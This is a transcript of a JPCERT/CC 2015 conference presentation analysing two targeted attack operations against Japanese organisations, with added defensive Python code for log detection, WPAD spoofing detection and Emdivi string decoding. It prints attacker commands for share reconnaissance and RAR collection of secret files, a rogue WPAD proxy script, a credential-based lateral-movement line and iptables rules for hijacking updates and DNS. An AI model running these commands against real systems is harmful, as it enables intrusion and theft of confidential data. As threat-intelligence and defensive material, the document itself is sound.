Revealing the Attack Operations Targeting Japan
JPCERT/CC
Shusei Tomonaga, Yuu Nakamura
CODE BLUE 2015

Copyright2015 JPCERT/CC All rights reserved.

Agenda
- Introduction
- Operation A
- Operation B

Self-introduction
Shusei Tomonaga and Yuu Nakamura, Analysis Center at JPCERT Coordination Center: malware analysis, forensic investigation.

JPCERT Coordination Center (Japan Computer Emergency Response Team Coordination Center)
- Early warning information
- CSIRT establishment support
- Industrial control system security
- International collaboration
- Artifact (e.g. malware) analysis

Targeted Attacks handled by JPCERT/CC
From April to September 2015: 934 (value on the slide's chart); 130 organizations.
- Operation A: 93 organizations
- Operation B: 4 organizations

Introducing 2 Types of Attack Operations

Agenda: Operation A

Characteristics of Operation A
Diagram: the attackers' infrastructure overseas reaches victim organizations in Japan (public offices, private companies) through compromised Web sites (watering hole), targeted emails and widespread emails.
Vulnerabilities used: Flash Player (CVE-2015-5119, CVE-2015-5122); MS14-068 (Kerberos, 3011780) - CVE-2014-6324.

Details of Internal Intrusion Techniques

Attack Patterns
Timeline of attack vectors (chart): disguised icon; document file (exploiting vulnerabilities: CVE-2014-7247, CVE-2015-5119, CVE-2015-5122); drive-by download. Dates marked on the chart: 2014/05, 2014/09, 2014/11, 2015/01, 2015/05, 2015/07, 2015/09. Lure themes: medical expense, health insurance.
In many attacks, the malware is disguised with a fake icon, compressed with zip or lzh, and attached to emails. Attacks aimed at specific targets may involve an exchange of emails with the victim.

Investigation of Compromised Environment
Uses legitimate tools provided by Microsoft.

Example of Using dsquery
Used in some cases targeting specific individuals.

Collecting Email Account Information
- Uses free tools (similar to NirSoft Mail PassView)
- Attempts to receive emails from outside
- May lead to new attack emails (exchange of emails): infection spreads from organization to organization

Collecting Classified / Personal Information

Search Network Drive (1)

    > net use
    New connections will be remembered.

    Status  Local  Remote             Network
    -------------------------------------------------------------------------------
    OK      T:     \\FILESV01\SECRET  Microsoft Windows Network
    OK      U:     \\FILESV02\SECRET  Microsoft Windows Network

    > wmic logicaldisk get caption,providername,drivetype,volumename
    Caption  DriveType  ProviderName       VolumeName
    C:       3                             OS
    D:       3                             Volume
    T:       4          \\FILESV01\SECRET  Volume
    U:       4          \\FILESV01\SECRET  Volume

net use command and wmic command; DriveType = 4 means a network drive.

Search Network Drive (2)

    > netstat -an
    TCP    192.168.xx.xx:49217    192.168.yy.yy:445    ESTABLISHED

    > nbtstat -a 192.168.yy.yy
    Name      Type    Status
    ---------------------------------------------
    FILESV01  UNIQUE  Registered

Combination of the netstat and nbtstat commands: port 445 is used as the key to find the hosts providing the file sharing service.

Search Targeted Data

    > dir c:\users\hoge\*.doc* /s /o-d

     c:\users\hoge\AppData\Local\Temp Directory
    2014/07/29  10:19            28,672 20140820.doc
                  1 File          28,672 bytes

     c:\users\hoge\Important Information Directory
    2015/08/29  10:03             1,214 Design Document.doc

    > dir \\FILESV01\SECRET

     \\FILESV\SECRET Directory
    2014/07/11  09:16    [DIR]          Management of Partner Companies
    2014/09/04  11:49    [DIR]          Management of Intellectual Property
    2014/08/01  09:27    [DIR]          Location information

dir command: searches not only the network drive but also the compromised computer itself. /s: displayed recursively; /o-d: sorted by date.

Compress, Download, Delete Evidence

    > winrar.exe a -r -ed -v300m -ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\Management of Intellectual Property -n*.ppt* -n*.doc* -n*.xls* -n*.jtd

    Adding \\FILESV01\SECRET\Management of Intellectual Property\Committee List(2015.05.01).docx  OK
    Adding \\FILESV01\SECRET\Management of Intellectual Property\Framework.ppt                     OK
    Adding \\FILESV01\SECRET\Management of Intellectual Property\Application List.xlsx             OK
    Adding \\FILESV01\SECRET\Management of Intellectual Property\Design Document.jtd               OK

Documents are compressed with RAR, one archive per folder. The RAR files are sent to the C&C servers and then deleted.
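The share enumeration, file-server lookup, document search and RAR collection commands on the preceding slides form a recognizable chain. The following Python, added here and not part of the JPCERT/CC material, scores process-creation logs for that chain; the "time|host|user|command" log format and the log lines are constructed for the example.

```python
# Added example, not from the JPCERT/CC slides: detect the share enumeration,
# file-server lookup, document search and RAR collection chain shown above in
# process-creation logs. The log format "time|host|user|command" is constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex per stage of the chain the slides describe, in slide order.
STAGES = [
    ("share_enum",  re.compile(r"^(net\s+use|wmic\s+logicaldisk)\b", re.I)),
    ("smb_lookup",  re.compile(r"^(netstat\s+-an|nbtstat\s+-a\s+\S+)", re.I)),
    ("doc_search",  re.compile(r"^dir\s+.*\*\.(doc|xls|ppt|jtd)\*?.*\s/s\b", re.I)),
    ("rar_collect", re.compile(r"\b(winrar|rar)(\.exe)?\s+a\b.*-ta\d{8}.*-n\*\.(doc|xls|ppt|jtd)", re.I)),
]

# Constructed log: PC-A runs the full chain from the slides, PC-B only a benign lookup.
SAMPLE_LOG = r"""2015-08-29T10:00:01|PC-A|hoge|net use
2015-08-29T10:00:09|PC-A|hoge|wmic logicaldisk get caption,providername,drivetype,volumename
2015-08-29T10:01:30|PC-A|hoge|netstat -an
2015-08-29T10:01:44|PC-A|hoge|nbtstat -a 192.168.yy.yy
2015-08-29T10:03:12|PC-A|hoge|dir c:\users\hoge\*.doc* /s /o-d
2015-08-29T10:05:40|PC-A|hoge|winrar.exe a -r -ed -v300m -ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\Management of Intellectual Property -n*.ppt* -n*.doc* -n*.xls* -n*.jtd
2015-08-29T11:12:00|PC-B|admin|net use
2015-08-29T11:12:30|PC-B|admin|dir d:\backup /s"""

def detect_recon_chains(log_text, window_minutes=30, min_stages=3):
    """Return {host: [stages hit]} for hosts that reach min_stages distinct
    stages within the time window; a lone 'net use' is not reported."""
    window = timedelta(minutes=window_minutes)
    events = defaultdict(list)  # host -> [(timestamp, stage)]
    for line in log_text.splitlines():
        ts, host, _user, cmd = line.split("|", 3)
        for stage, pattern in STAGES:
            if pattern.search(cmd):
                events[host].append((datetime.fromisoformat(ts), stage))
    hits = {}
    for host, seen in events.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            in_window = {stage for t, stage in seen[i:] if t - start <= window}
            if len(in_window) >= min_stages:
                hits[host] = [name for name, _ in STAGES if name in in_window]
                break
    return hits

if __name__ == "__main__":
    for host, stages in detect_recon_chains(SAMPLE_LOG).items():
        print(host, "->", " > ".join(stages))
```

Tuning the window and the stage threshold trades false positives from administrators against missed slow collection.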

Methods Used to Spread Infection

Exploiting Vulnerabilities (MS14-068 + MS14-058)
Diagram: PC-A (initially compromised), Domain Controller, PC-B.
1. Escalate privilege on PC-A (MS14-058) and dump users' passwords with mimikatz
2. Exploit the MS14-068 vulnerability and gain Domain Admin privileges
3. Upload mimikatz to the DC and dump the admins' passwords
4. Copy malware to PC-B
5. Register a task in order to execute the malware
6. The malware executes according to the task

Investigating SYSVOL Scripts
Diagram: attackers' infrastructure (C2 server), PC-A, Domain Controller, PC-B.
1. Download the logon scripts, compress and archive them
2. Download the archive to the C2 server
3. Search the scripts for admins' passwords
4. Copy malware to PC-B
5. Register a task in order to execute the malware
6. The malware executes according to the task

Password List-based Attack
Diagram: PC-A, Domain Controller, PC-B.
1. Get the list of Domain Admins users from the Domain Controller
2. Attempt logon to PC-B with logon.exe
3. Copy malware
4. Register a task
5. Execute

Exploiting Built-in Administrator Password
Diagram: PC-A, PC-B.
1. Escalate privilege (UAC bypass) and dump users' passwords
2. Pass the hash, or net use: net use \\PC-B\IPC$ [password] /u:Administrator
3. Copy malware
4. Register a task
5. Execute

Setting Malware in File Servers
Diagram: PC-A, File Server, PC-B.
1. Replace an existing file on the file server with malware disguised with a fake icon
2. The malware on the file server is executed (by users on other PCs)

Exploiting WPAD
WPAD (Web Proxy Auto-Discovery): turned on by default. The automatic configuration script is obtained from either the URL specified by the DHCP server, or http://wpad/wpad.dat.

Exploiting WPAD (Step 1: NetBIOS Spoofing)
PC-A runs wpad.exe.
1. PC-B broadcasts a name query: NB WPAD
2. PC-A sends a name query response ("I am WPAD")

Exploiting WPAD (Step 2: Fake WPAD Server)
3. PC-B requests http://wpad/wpad.dat
4. wpad.exe on PC-A responds with wpad.dat (automatic configuration script):

    function FindProxyForURL(url, host) {
        if (myIpAddress() != "[PC-A addr]") {
            return "PROXY wpad:8888; DIRECT";
        }
        return "DIRECT";
    }

Exploiting WPAD (Step 3: Man in the Middle Proxy)
5. wpad.exe on PC-A proxies PC-B's Web traffic and embeds an iframe pointing to the attackers' Web site (attackers' infrastructure)
6. Drive-by download attack from the attackers' Web site
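Step 1 above relies on a host answering the NetBIOS name query for WPAD. The following Python, added here and not part of the JPCERT/CC material, decodes NetBIOS Name Service packets and flags any host that answers that query; the packets and addresses are constructed for the example.

```python
# Added example, not from the JPCERT/CC slides: parse NetBIOS Name Service
# (UDP/137) packets and flag hosts that answer the "WPAD" name query, which is
# the spoofing step 1 above. All packets below are constructed, not captured.
import struct

NB_TYPE = 0x0020  # NetBIOS name service resource record type "NB"

def encode_nb_name(name, suffix=0x00):
    """First-level encoding: name padded to 15 bytes plus a suffix byte,
    each byte split into two nibbles, each nibble + 0x41 ('A')."""
    raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    return b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)

def decode_nb_name(encoded):
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]

def parse_nbns(pkt):
    """Return (is_response, name, suffix, answered_ip) for a one-record NBNS packet."""
    _tid, flags, _qd, an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    pos = 13 + pkt[12]                         # skip length byte and encoded name
    name, suffix = decode_nb_name(pkt[13:pos])
    pos += 1                                   # terminating zero label
    rtype, _rclass = struct.unpack("!HH", pkt[pos:pos + 4]); pos += 4
    ip = None
    if flags & 0x8000 and an and rtype == NB_TYPE:
        pos += 8                               # answer RR: TTL(4) RDLENGTH(2) NB_FLAGS(2)
        ip = ".".join(str(b) for b in pkt[pos:pos + 4])
    return bool(flags & 0x8000), name, suffix, ip

def build_query(tid, name):
    return (struct.pack("!6H", tid, 0x0110, 1, 0, 0, 0) + b"\x20" + encode_nb_name(name)
            + b"\x00" + struct.pack("!HH", NB_TYPE, 1))

def build_response(tid, name, ip):
    rdata = struct.pack("!H", 0x0000) + bytes(int(o) for o in ip.split("."))
    return (struct.pack("!6H", tid, 0x8500, 0, 1, 0, 0) + b"\x20" + encode_nb_name(name)
            + b"\x00" + struct.pack("!HHIH", NB_TYPE, 1, 300000, len(rdata)) + rdata)

def find_wpad_responders(packets):
    """packets: iterable of (source_ip, raw_nbns). Any NBNS *response* for the
    WPAD name is suspicious on a network that serves WPAD via DNS or DHCP."""
    found = set()
    for src, raw in packets:
        is_resp, name, _suffix, ip = parse_nbns(raw)
        if is_resp and name == "WPAD":
            found.add((src, ip))
    return sorted(found)

# Constructed traffic: PC-B (.20) broadcasts the query, PC-A (.10) answers "I am WPAD".
SAMPLE_PACKETS = [
    ("192.168.0.20", build_query(0x1234, "WPAD")),
    ("192.168.0.10", build_response(0x1234, "WPAD", "192.168.0.10")),
    ("192.168.0.30", build_response(0x1235, "FILESV01", "192.168.0.30")),
]
```

Disabling NetBIOS name resolution, or publishing a real WPAD record in DNS, removes the window the spoofing step depends on.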

Summary: Methods of Spreading Infection

Method | AD | Privilege escalation | Note
MS14-068 | Necessary | Unnecessary (necessary for password dump) | Risk exists when the DC is unpatched
SYSVOL search | Necessary | Unnecessary | 
Brute force attack (password list attack) | Necessary | Unnecessary | Risk exists when the password is weak
Abusing built-in Administrator | Unnecessary | Necessary | Presumes that the password is the same
Exploiting file servers | Unnecessary | Unnecessary | Risk exists when the file is disguised as one that many users open
Exploiting WPAD | Unnecessary | Unnecessary | Situations are limited

Details of Tools and Malware

Characteristics of Malware

Malware | Overview | File format | Form of attack
Emdivi (t17) | HTTP BOT | EXE | Intrude
Tools | Password dump, etc. | EXE, etc. | Intrude
usp10jpg | Download (low-frequency communication) | DLL, data | Lateral movement
Emdivi (t19, t20) | HTTP BOT (more sophisticated than t17) | EXE | Lateral movement
BeginX | Remote shell tool | EXE | Lateral movement
GStatus | HTTP BOT (low-frequency communication) | EXE, DLL | Conceal?

Reference: Ayaka Funakoshi. A study on malware characteristics and its effects observed in targeted attacks. MWS, 2015.
Different types of malware are used depending on the phase of the attack and the scale of the damage.

Tools

Type | Overview | Filename
Password dump / Pass-the-hash | Quarks PwDump | qp.exe, qd.exe, QDump.exe, etc.
Password dump / Pass-the-hash | Mimikatz Lite | gp.exe
Password dump / Pass-the-hash | Windows Credentials Editor | wce.exe, ww.exe
Password dump / Pass-the-hash | Mimikatz | mz.exe, mimikatz.exe, mimikatz.rar (sekurlsa.dll)
Vulnerability exploitation | MS14-068 (CVE-2014-6324) | ms14-068.exe, ms14-068.tar.gz
Vulnerability exploitation | MS14-058 (privilege escalation) (CVE-2014-4113) | 4113.exe
UAC bypass | UAC bypass tool | msdart.exe, puac.exe, etc.
Packet transmit | Htran, proxy-adaptive Htran | htproxy.exe, etc.
Mail account theft | Similar to NirSoft Mail PassView | CallMail.exe, outl.exe, etc.
Utility | Attempt logon based on a list | logon.exe
Utility | WinRAR archiver | yrar.exe, rar.exe, etc.
Utility | Highly sophisticated dir command | dirasd.exe, etc.
Utility | Change timestamp | timestomp.exe

Emdivi (t17)
HTTP BOT with basic functions. Repeatedly upgraded over the past year, with new commands implemented.

Command | Date of implementation
DOABORT | -
DOWNBG | -
GETFILE | -
LOADDLL | -
SETCMD | -
SUSPEND | -
UPLOAD | -
VERSION | -
GOTO | May 2015
CLEARLOGS | August 2015

Emdivi (t20): Highly Sophisticated Emdivi
- The number of implemented commands has increased and decreased over the past year: 18 to 41 (based on JPCERT/CC's study)
- In some cases, the targeted organization's proxy server address is hard-coded
- May only run on specific computers (data is encrypted with the computer's SID)

usp10jpg: Download (low-frequency communication)
- Communication is performed once a day; the day of the week for communication can be specified
- Tends to be placed on computers that are not infected with Emdivi (secondary infection)
- DLL preloading attack: exploits the DLL search order of a specific application so that the application loads the malicious DLL (dwmapi.dll, etc.), which reads data from a ***.DAT file and executes it

Difficulty of Detecting usp10jpg
Diagram: the computer infected with Emdivi is easy to detect due to its high-frequency communication with the attackers' infrastructure; usp10jpg may be left undetected due to its low-frequency communication.

BeginX: Remote Shell Tool
- BeginX Server: listens on specific ports and waits for commands; both UDP and TCP versions are available
- BeginX Client: sends commands to the BeginX Server; controlled via Emdivi

Image of Using BeginX
Diagram: the computer infected with Emdivi (controlled from the attackers' infrastructure) runs the BeginX client. A computer in a segment that cannot connect to the Internet cannot be controlled through an Emdivi infection, but can be controlled via BeginX (it runs the BeginX server).

GStatus: HTTP BOT Different from Emdivi
Not found in many organizations, but...
Bot functions: get drive information; execute arbitrary shell commands; process list; screen-related functions.

GStatus Web Panel (admin screen): screenshot.

Analysis Tools: emdivi_string_decryptor.py

Emdivi encoded strings (screenshot of the encoded strings inside the binary).

Difference depending on the version string:

 | Ver 17 | Ver 19 or 20 | Ver 20
Encrypt | XxTEA encrypt | XxTEA decrypt | AES decrypt
Decrypt | XxTEA decrypt | XxTEA encrypt | AES encrypt
Key | MD5( MD5(base64(ver)) + MD5(key_string) ) | Scanf("%x", Inc_Add(ver17_key)) | Inc_Add(ver17_key)
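As an added example (not JPCERT/CC's emdivi_string_decryptor.py), the following Python implements the version-dependent XXTEA direction from the table with the Ver 17 key formula. The hex-digest concatenation in the key formula, the little-endian word layout and the NUL padding are this example's assumptions; the Ver 19/20 key is supplied by the caller and the AES variant is not covered.

```python
# Added example, not JPCERT/CC's emdivi_string_decryptor.py: XXTEA string
# decoding with the version-dependent direction from the table above (v17
# encodes with XXTEA encrypt, v19/v20 with XXTEA decrypt; AES not covered).
# Assumed: v17 key formula concatenates hex digests; strings are little-endian
# 32-bit words, NUL-padded to at least 8 bytes.
import base64, hashlib, struct

DELTA, MASK = 0x9E3779B9, 0xFFFFFFFF

def _mx(s, y, z, p, e, k):
    return ((((z >> 5) ^ ((y << 2) & MASK)) + ((y >> 3) ^ ((z << 4) & MASK)))
            ^ ((s ^ y) + (k[(p & 3) ^ e] ^ z))) & MASK

def xxtea_encrypt(v, k):
    """Standard XXTEA (btea) encryption of a list of uint32 words, in place."""
    n, s, z = len(v), 0, v[-1]
    for _ in range(6 + 52 // n):
        s = (s + DELTA) & MASK
        e = (s >> 2) & 3
        for p in range(n):
            y = v[(p + 1) % n]
            v[p] = (v[p] + _mx(s, y, z, p, e, k)) & MASK
            z = v[p]
    return v

def xxtea_decrypt(v, k):
    n = len(v)
    rounds = 6 + 52 // n
    s, y = (rounds * DELTA) & MASK, v[0]
    for _ in range(rounds):
        e = (s >> 2) & 3
        for p in range(n - 1, -1, -1):
            z = v[p - 1]  # p == 0 wraps to the last word, as in the reference code
            v[p] = (v[p] - _mx(s, y, z, p, e, k)) & MASK
            y = v[p]
        s = (s - DELTA) & MASK
    return v

def v17_key(ver, key_string):
    """MD5( MD5(base64(ver)) + MD5(key_string) ) as four uint32 words (assumed reading)."""
    a = hashlib.md5(base64.b64encode(ver.encode())).hexdigest()
    b = hashlib.md5(key_string.encode()).hexdigest()
    return list(struct.unpack("<4I", hashlib.md5((a + b).encode()).digest()))

def _to_words(data):
    data = data + b"\0" * (-len(data) % 4)
    data = data + b"\0" * max(0, 8 - len(data))  # XXTEA needs at least two words
    return list(struct.unpack("<%dI" % (len(data) // 4), data))

# Direction per version string, from the table: v19/v20 run the cipher backwards.
ENCODE = {"t17": xxtea_encrypt, "t19/t20": xxtea_decrypt}
DECODE = {"t17": xxtea_decrypt, "t19/t20": xxtea_encrypt}

def encode_string(version, key, text):
    words = ENCODE[version](_to_words(text.encode()), key)
    return struct.pack("<%dI" % len(words), *words)

def decode_string(version, key, blob):
    words = DECODE[version](_to_words(blob), key)
    return struct.pack("<%dI" % len(words), *words).rstrip(b"\0").decode()
```

Because the Ver 19/20 samples apply the decrypt routine when encoding, a decoder that only knows the Ver 17 direction will produce garbage on them; checking the version string first is the point of the table.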

emdivi_string_decryptor.py (tool usage and output screenshots)

Demo

Agenda: Operation B

Attack Techniques

Drive-by Download (Watering Hole) Attack
Diagram: targeted organization, Japanese Web server, attackers' server.
0. Deface the Web site (Japanese Web server)
1. Access to the Web site from the targeted organization
2. Redirect to the attackers' server
3. Download malware
4. Malware infection

Access Control
.htaccess on the defaced site restricts access by target name and IP address.

0-day Exploits

Update Hijacking (method used to alter the update information)
Diagram: targeted organization, update server, fake update server.
0. Alter the update information on the update server
1. Request to update
2. Fake update information is returned
3. Request to download from the fake update server
4. Download malware
5. Malware infection

Another Update Hijacking Pattern (method used without changing the update server's file)
Diagram: targeted organization, update server, fake update server.
0. Change iptables on the update server
1. Software update (the request is forwarded to the fake update server)

    iptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:53

TCP 80 is forwarded by iptables.

Domain Name Hijacking
Diagram: targeted organization; registrar / Registry.com; DNS server; attackers' infrastructure (DNS server, Web server); legitimate server (DNS server, Web server).
0. Change the registration information at the registrar
1. DNS query
2. DNS query (answered by the attackers' DNS server)
4. Web access (to the attackers' Web server)

Domain Name Hijacking: routing of only specific DNS queries by using iptables (example name: AAA.example.com)

    iptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 30 --to 34 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:53

Details of Malware

Characteristics of Malware
- Uses different malware before and after the intrusion
- Some malware runs in memory only
- Embeds the target organization's internal information
- Uses a code signing certificate in some cases
Phases: Intrusion / Concealing

Malware (Intrusion): HTTP bot with basic functions
Command list:

Command | Info
0x184004 | Execute remote shell
0x184008 | Run remote shell command
0x18400c | Create file
0x184010 | Load file
0x184014 | Get drive information
0x184018 | Create directory
0x18401c | Search file
0x184020 | Delete file
0x184024 | Move file
0x184028 | Process list
0x18402c | Terminate process
0x184030 | Sleep
0x184034 | Install command
0x184038 | Set sleep time
0x18403c | Terminate

IP Address Acquisition Algorithm
Get the C2 IP address from a Web page and decode it. Markers: start "@MICR0S0FT", end "C0RP0RATI0N"; start "lOve yOu 4 eveR", end "Reve 4 uOy evOl".

Malware (Intrusion): Plug-in-based malware
Command list:

Command number | Info
0 | Send data to server
1 | Set TickCount
3 | Plug-in registration
4 | Allocate plug-in settings area
5 | Set plug-in settings area
6 | Create/Execute plug-in
7 | Terminate plug-in
8 | Create configuration file
9 | -

Malware Running in Memory Only: CVE-2013-3918 with McRAT
Diagram: ROP, shellcode, malware (skip).
- Executes rundll32.exe and injects code
- McRAT's data located below the shellcode is injected
- Not saved as a file

Malware (Intrusion): Simple HTTP bot with limited functions
Command list:

Command | Info
downonly | Download file
downexec | Download and execute file
- | Run remote shell command

Preshin Controller
PHP-based controller. Example of command execution (screenshot).

Malware (Intrusion): HTTP bot with basic functions
Command list:

Command | Info
1 | Get disk information
2 | File list
3 | Open file
4 | Upload file
5 | Create file
7 | Load file
8 | -
9 | Delete file
10 | Delete file/folder
11 | Upload file
12 | Create folder
13 | Move file

Malware (Concealing): Malware with rootkit functions (Hikit)
Command list:

Command | Info
file | File related operation
info | Send configuration information
proxy | Enable proxy settings
connect | Connect to Hikit proxy
shell | Run remote shell command
socks5 | Enable proxy settings (socks5)
exit | Terminate

Hikit Configuration Information
Hikit holds proxy information of the internal network: proxy info, ID, target name, rootkit setting.

Malware (Concealing): Malware recently often used (Derusbi)
Command list:

Command | Info
cmd4 | Service/process related operation
cmd5 | Run remote shell command
cmd6 | Connect to Derusbi proxy
cmd7 | File operation
cmd8 | Terminate
cmd9 | Create/delete file

Derusbi Configuration Information
Derusbi holds proxy information of the internal network: proxy info, ID.

Code Signing Certificate

Identity | Type | Country
System integrator | exe | Japan
Software vendor | exe | Japan
Software vendor | exe | Korea
Automaker | exe | Korea
Heavy industry | jar | Korea
Software vendor | exe | Korea
Electronics industry | jar | Korea
Software vendor | exe | Korea

Infrastructure Used by Attackers
Diagram: the targeted organization in Japan connects to the attackers' server (Web server); traffic is relayed through an overseas server with a backdoor and iptables to the C2 server.

Linux Backdoor
Based on the mod_rootme source. Keyword: Roronoa.

Functions (three columns as on the slide):
MyNetstat | CreateShell | Mymkdir
PortTunnelGet | GetFileSource | Mymkfile
PortTunnel_RemoteClose | MyPs | Myrmfile
PortTunnel_Show | KillByPid | Myrmdir
CreatePortTunnel | NewConnectTo | ListDir
PortForwardStart | PutFile | my_reboot
PortForward_Show | PutFileDest | ShowHide
PortForward_Close | ShellServer | SwitchHide

Analysis Tools: apt17scan.py

Workflow:
1. Scan with YARA
2. Search the configuration data address
3. Parse the configuration data
4. Dump the configuration

Commands:
- apt17scan: detecting malware
- derusbiconfig: dump configuration information for Derusbi
- hikitconfig: dump configuration information for Hikit
- agtidconfig: dump configuration information for Agtid

Demo

How to Download
https://github.com/JPCERTCC

Thank you
[email protected]
www.jpcert.or.jp

Incident report: [email protected]
www.jpcert.or.jp/form/